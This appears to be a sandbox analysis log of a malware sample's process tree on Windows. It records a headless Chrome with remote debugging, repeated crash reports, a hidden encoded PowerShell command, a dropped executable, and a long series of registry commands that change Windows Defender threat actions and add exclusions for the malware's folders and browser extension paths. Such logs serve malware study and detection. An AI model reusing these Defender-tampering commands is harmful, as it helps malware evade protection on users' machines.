C:\Users\Admin\AppData\Roaming\toc\Chrome\Application\chrome.exe
"C:\Users\Admin\AppData\Roaming\toc\Chrome\Application\chrome.exe" --type=renderer --headless --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1. 38 (KHTML, like Gecko) Version/11.0 Mobile/15A356 Safari/604.1" --lang=sv --no-sandbox --enable-automation --enable-logging --log-level=0 --remote-debugging-port=9371 --test-type=webdriver --allow-pre-commit-input --enable-blink-features=ShadowDOMV0 --lang=sv --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=2020 --field-trial-handle=1516,i,8072632670263732563,6760705564254250393,131072 --disable-features=PaintHolding /prefetch:1
9⤵
- Checks computer location settings
- Executes dropped EXE
PID:3848

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3308 -s 2180
4⤵
- Program crash
PID:3952

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3308 -s 2192
4⤵
- Program crash
PID:2656

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3308 -s 2180
4⤵
- Program crash
PID:4176

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3308 -s 1964
4⤵
- Program crash
PID:1748

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3308 -s 2196
4⤵
- Program crash
PID:3764

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3308 -s 2148
4⤵
- Program crash
PID:4488

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3308 -s 1752
4⤵
- Program crash
PID:3068

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3308 -s 2040
4⤵
- Program crash
PID:2868

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3308 -s 2172
4⤵
- Program crash
PID:4232

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3308 -s 2168
4⤵
- Executes dropped EXE
- Program crash
- Suspicious use of SetWindowsHookEx
PID:3808

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3308 -s 2140
4⤵
- Program crash
PID:5080

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3308 -s 1712
4⤵
- Program crash
PID:2128

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3308 -s 1472
4⤵
- Program crash
PID:3512

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3308 -s 2008
4⤵
- Program crash
PID:2976

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3308 -s 1824
4⤵
- Program crash
PID:1728

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3308 -s 1784
4⤵
- Program crash
PID:2876

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3308 -s 2036
4⤵
- Program crash
PID:4860

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3308 -s 968
4⤵
- Program crash
PID:428

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3308 -s 1824
4⤵
- Program crash
PID:6020

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3308 -s 1976
4⤵
- Program crash
PID:2008

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3308 -s 140
4⤵
- Program crash
PID:3552

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 192 -p 2236 -ip 2236
1⤵
PID:2128

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2236 -ip 2236
1⤵
PID:212

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 2236 -ip 2236
1⤵
PID:4828

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 2236 -ip 2236
1⤵
PID:852

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 372 -p 3308 -ip 3308
1⤵
PID:3524

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 3308 -ip 3308
1⤵
PID:3828

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 3308 -ip 3308
1⤵
PID:3792

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 3308 -ip 3308
1⤵
PID:3192

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 3308 -ip 3308
1⤵
PID:4740

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 3308 -ip 3308
1⤵
PID:972

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 3308 -ip 3308
1⤵
PID:1192

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 372 -p 3308 -ip 3308
1⤵
PID:3716

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 3308 -ip 3308
1⤵
PID:236

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 3308 -ip 3308
1⤵
PID:1616

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 3308 -ip 3308
1⤵
PID:3408

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 3308 -ip 3308
1⤵
PID:2248

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 3308 -ip 3308
1⤵
PID:4868

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 3308 -ip 3308
1⤵
PID:1952

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 3308 -ip 3308
1⤵
PID:3312

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 3308 -ip 3308
1⤵
PID:2656

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 3308 -ip 3308
1⤵
PID:2432

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 3308 -ip 3308
1⤵
PID:3736

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 3308 -ip 3308
1⤵
PID:3688

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 3308 -ip 3308
1⤵
PID:5032

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 3308 -ip 3308
1⤵
PID:4636

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 3308 -ip 3308
1⤵
PID:2740

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 3308 -ip 3308
1⤵
PID:4388

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 3308 -ip 3308
1⤵
PID:2700

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 3308 -ip 3308
1⤵
PID:1816

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 3308 -ip 3308
1⤵
PID:1992

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 3308 -ip 3308
1⤵
PID:3640

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 3308 -ip 3308
1⤵
PID:4720

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 3308 -ip 3308
1⤵
PID:4868

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 3308 -ip 3308
1⤵
PID:5040

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 3308 -ip 3308
1⤵
PID:4656

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 3308 -ip 3308
1⤵
PID:3972

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 3308 -ip 3308
1⤵
PID:564

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 3308 -ip 3308
1⤵
PID:3152

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 3308 -ip 3308
1⤵
PID:5052

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 3308 -ip 3308
1⤵
PID:4464

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:4660

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
2⤵
PID:1140

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 372 -p 3308 -ip 3308
1⤵
PID:740

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 3308 -ip 3308
1⤵
PID:1600

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 3308 -ip 3308
1⤵
PID:4652

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 3308 -ip 3308
1⤵
PID:524

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 3308 -ip 3308
1⤵
PID:3456

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 3308 -ip 3308
1⤵
PID:3324

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 3308 -ip 3308
1⤵
PID:2876

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 3308 -ip 3308
1⤵
PID:3360

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 3308 -ip 3308
1⤵
PID:1416

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 3308 -ip 3308
1⤵
PID:2224

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 3308 -ip 3308
1⤵
PID:4440

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 396 -p 3308 -ip 3308
1⤵
PID:4340

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 3308 -ip 3308
1⤵
PID:4468

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:4260

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 3308 -ip 3308
1⤵
PID:2464

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 3308 -ip 3308
1⤵
PID:3456

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 396 -p 3308 -ip 3308
1⤵
PID:4712

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 3308 -ip 3308
1⤵
PID:1680

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:4636

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
- Drops file in Windows directory
PID:2768

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:740

C:\Users\Admin\AppData\Local\Temp\wHhNLFWDcbvPErQrR\WGazEahxDSJaqMe\nohHFDg.exe
C:\Users\Admin\AppData\Local\Temp\wHhNLFWDcbvPErQrR\WGazEahxDSJaqMe\nohHFDg.exe cw /site_id 690689 /S
1⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:4464

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
2⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:4144

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
3⤵
PID:4408

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
4⤵
PID:5064

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
3⤵
PID:1220

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
3⤵
PID:2960

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
3⤵
PID:584

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
3⤵
PID:4064

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
3⤵
PID:3972

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
3⤵
PID:1512

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
3⤵
PID:2188

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
3⤵
PID:1600

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
3⤵
PID:1220

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
3⤵
PID:2960

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
3⤵
PID:584

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
3⤵
PID:4792

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
3⤵
PID:2312

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
3⤵
PID:4908

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
3⤵
PID:1600

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
3⤵
PID:1220

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
3⤵
PID:2808

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
3⤵
PID:4064

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
3⤵
PID:3792

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
3⤵
PID:5064

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
3⤵
PID:2780

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
3⤵
PID:4688

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
3⤵
PID:740

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
3⤵
PID:3188

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
3⤵
PID:4716

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
3⤵
PID:4792

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
3⤵
PID:4408

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YyYjRnRkbVRlC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YyYjRnRkbVRlC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ltrhbdpAzPnaisqePaR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ltrhbdpAzPnaisqePaR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\uXFrNnbxU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\uXFrNnbxU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\xzDgZbVAMpcU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\xzDgZbVAMpcU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zWoUVQYphcUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zWoUVQYphcUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\uoeTMjmBwbxJSYVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\uoeTMjmBwbxJSYVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\wHhNLFWDcbvPErQrR\" /t REG_DWORD 